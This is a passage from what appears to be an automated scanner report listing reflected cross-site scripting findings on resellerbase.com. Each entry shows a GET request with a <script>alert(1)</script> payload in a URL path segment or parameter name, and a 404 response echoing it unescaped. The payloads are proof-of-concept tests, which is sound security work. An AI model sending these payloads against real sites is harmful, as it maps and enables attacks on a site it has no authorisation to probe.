<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes17bd1<script>alert(1)</script>4dea439c857/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3990. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9fbf5<script>alert(1)</script>e278c2d8477 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos9fbf5<script>alert(1)</script>e278c2d8477/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos9fbf5<script>alert(1)</script>e278c2d8477/ was not found on this server.</p>
...[SNIP]...

2.3991. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd12f<script>alert(1)</script>435c733f034 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/?cd12f<script>alert(1)</script>435c733f034=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/?cd12f<script>alert(1)</script>435c733f034=1 was not found on this server.</p>
...[SNIP]...

2.3992. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 453af<script>alert(1)</script>f0373629d4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information453af<script>alert(1)</script>f0373629d4c/ebooks/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information453af<script>alert(1)</script>f0373629d4c/ebooks/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3993. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb49f<script>alert(1)</script>ed48309c308 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebookseb49f<script>alert(1)</script>ed48309c308/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebookseb49f<script>alert(1)</script>ed48309c308/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3994. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9de87<script>alert(1)</script>d789981ea38 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes9de87<script>alert(1)</script>d789981ea38/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes9de87<script>alert(1)</script>d789981ea38/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3995. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e856<script>alert(1)</script>d7193c5b61c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos7e856<script>alert(1)</script>d7193c5b61c/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos7e856<script>alert(1)</script>d7193c5b61c/images/ was not found on this server.</p>
...[SNIP]...

2.3996. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 45d55<script>alert(1)</script>0f4ba834f7b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images45d55<script>alert(1)</script>0f4ba834f7b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images45d55<script>alert(1)</script>0f4ba834f7b/ was not found on this server.</p>
...[SNIP]...

2.3997. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4d55<script>alert(1)</script>e44d3d77a90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/?f4d55<script>alert(1)</script>e44d3d77a90=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/?f4d55<script>alert(1)</script>e44d3d77a90=1 was not found on this server.</p>
...[SNIP]...

2.3998. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6be97<script>alert(1)</script>8f46e039ac3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information6be97<script>alert(1)</script>8f46e039ac3/ebooks/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information6be97<script>alert(1)</script>8f46e039ac3/ebooks/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3999. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e8fc<script>alert(1)</script>79f58fc56ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks3e8fc<script>alert(1)</script>79f58fc56ac/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks3e8fc<script>alert(1)</script>79f58fc56ac/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4000. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b2aa5<script>alert(1)</script>d0f50e781a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesb2aa5<script>alert(1)</script>d0f50e781a9/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesb2aa5<script>alert(1)</script>d0f50e781a9/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4001. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 14339<script>alert(1)</script>40489025520 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos14339<script>alert(1)</script>40489025520/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos14339<script>alert(1)</script>40489025520/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4002. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2dd19<script>alert(1)</script>70273f00ed6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images2dd19<script>alert(1)</script>70273f00ed6/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images2dd19<script>alert(1)</script>70273f00ed6/rating/ was not found on this server.</p>
...[SNIP]...

2.4003. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b4bb2<script>alert(1)</script>e8d4e3e236b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/ratingb4bb2<script>alert(1)</script>e8d4e3e236b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/ratingb4bb2<script>alert(1)</script>e8d4e3e236b/ was not found on this server.</p>
...[SNIP]...

2.4004. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ed60<script>alert(1)</script>d8c3aea8e4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/?5ed60<script>alert(1)</script>d8c3aea8e4a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/?5ed60<script>alert(1)</script>d8c3aea8e4a=1 was not found on this server.</p>
...[SNIP]...

2.4005. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 878c5<script>alert(1)</script>3a7ca6de890 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information878c5<script>alert(1)</script>3a7ca6de890/ebooks/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information878c5<script>alert(1)</script>3a7ca6de890/ebooks/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4006. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26214<script>alert(1)</script>a1bcf784213 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks26214<script>alert(1)</script>a1bcf784213/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks26214<script>alert(1)</script>a1bcf784213/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4007. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c940b<script>alert(1)</script>cf3840767a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesc940b<script>alert(1)</script>cf3840767a5/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesc940b<script>alert(1)</script>cf3840767a5/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4008. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c094a<script>alert(1)</script>fd13b75a08a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmosc094a<script>alert(1)</script>fd13b75a08a/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
